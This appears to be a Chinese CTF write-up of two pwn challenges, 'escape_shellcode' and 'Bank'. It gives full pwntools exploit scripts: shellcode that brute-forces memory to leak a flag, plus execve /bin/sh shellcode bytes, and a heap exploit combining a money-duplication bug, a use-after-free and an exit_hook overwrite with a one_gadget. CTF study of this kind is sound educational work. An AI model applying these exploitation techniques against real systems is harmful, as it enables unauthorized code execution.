escape_shellcode(pie_orw_shellcode)

写入heap_mem+170地址后,情况除rip外的所有寄存器,然后执行shellcode。

难点在于没有基地址,无法打印bss段中的flag。

注意的点,堆地址高5位和基地址相同,从基地址开始0x1000地读

write系统调用会返回给rcx寄存器,下一条指令的地址(堆地址),堆地址和bss段前几位一样的,所有可以采用爆破,爆出flag

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
# _*_ coding:utf-8 _*_
from pwn import *
context.log_level='debug'
context(arch='amd64', os='linux')

p = process("./escape_shellcode")
elf = ELF("./escape_shellcode")
libc = elf.libc

def dbg():
    gdb.attach(p)

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------

base=0x500000000000

shell='''
mov rdi,1
mov rsi,{}
mov rdx,0x1000
mov r14,0xfffff0000000
mov r15,0x1000
mov rax,1
syscall


mov rsi,rcx
and rsi,r14
add rsi,r15
add r15,0x1000
jmp $-0x19
'''.format(base)

p.send(asm(shell))

p.recvuntil("flag{")
flag = 'flag{'+p.recvuntil("}")
print(flag)

Bank(exit_hook)

题目实现了一个简单的取款机,主要的难点在于无限刷钱,刷够钱才能做事,要不然原来的初始的190块钱不够用

漏洞点在这里:就是取钱的时候,如果取的钱数和账户里面相等,是不扣钱的,所以利用这个刷钱就行了。

刷够钱以后,后面思路就简单了,泄露堆地址和libc地址,往exit_hook里写入one_gadget即可。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
from pwn import *
from LibcSearcher import *
r = process("./Bank")
# r = remote('node4.buuoj.cn',29678)
e = ELF("./Bank")
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
context.arch = 'amd64'
libc = e.libc
# libc = ELF('./buu2.23.so')
r.timeout = 0.5
se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims			    :r.recvuntil(delims)
uu32    = lambda data               :u32(ru(data)[-4:].ljust(4, b'\0'))
uu64    = lambda data               :u64(ru(data)[-6:].ljust(8, b'\0'))
info_base = lambda tag, base        :r.info(tag + ': {:#x}'.format(base))
leak = lambda name,base :log.success('{} = {:#x}'.format(name, base))
#0x203010
def dbg(cmd):
	gdb.attach(r,cmd)
	pause()

def Login():
	ru(b'Click:')
	sl(b'Login')
	ru(b'Card Numbers: ')
	sl(b'1111111')
	ru(b'Password: ')
	sl(b'505050')
def Info():
	ru(b'Click:')
	sl(b'Info')
def put():
	ru(b'Click:')
	sl(b'Put')
	ru(b"How Much? ")
	sl(b'400')
def Deposit():
	ru(b'Click:')
	sl(b'Deposit')
	ru(b"How Much? ")
	sl(b'400')
def leak_admin(money): #leak _ptr + 8 * money
	ru(b'Click:')
	sl(b'Transfer')
	ru(b'who? ')
	sl(b'admin')
	ru(b'How much?')
	sl(str(money).encode())
def free_hacker(chunk_addr): #free uaf
	ru(b'Click:')
	sl(b'Transfer')
	ru(b'who? ')
	sl(b'hacker')
	ru(b'How much?')
	sl(b'51')
	se(str(chunk_addr).encode())
def add_guest(desc):
	ru(b'Click:')
	sl(b'Transfer')
	ru(b'who? ')
	sl(b'guest')
	ru(b'How much? ')
	sl(b'10')
	ru(b"data: ")
	se(desc)
def realloc_gohst(size): # change ptr
	ru(b'Click:')
	sl(b'Transfer')
	ru(b'who? ')
	sl(b'ghost')
	ru(b'How much? ')
	sl(b'11')
	ru(b"ghost: &^%$#@!   :)")
	se(str(size).encode())
	ru(b'"ghost: ??????? :("')
def abyss(addr):
	ru(b'Click:')
	sl(b'Transfer')
	ru(b'who? ')
	sl(b'abyss')
	ru(b'How much? ')
	sl(b'1')
	ru(b'"hacker: Great!"')
	se(addr)
# ptr = 203050 + 0x555555400000
Login()
put()
for i in range(20):
	Deposit()
for i in range(20):
	put()
pl1 = b'a'*(0x10)

realloc_gohst(0x100)
realloc_gohst(0xe0)
leak_admin(0x23)
ru(b'I think ')
heap = rc(14)
heap_base = int(heap,16) - 0x10
leak("heap_base",heap_base)
for i in range(8):
	realloc_gohst(0x100)
	realloc_gohst(0xe0)
leak_admin(242)
ru(b'I think ')
libc = rc(14)
libc_base = int(libc,16) - 0x1ecbe0
shell = libc_base+0xe6c7e
exit_hook = libc_base + 0x210150
realloc_gohst(0x18)
chunk = heap_base + 0xb40
leak("chunk",chunk)
free_hacker(chunk)
pl1 = b'aaaaaaaa'
for i in range(7):
	add_guest(pl1)
add_guest(p64(exit_hook))
abyss(p64(shell))

r.interactive()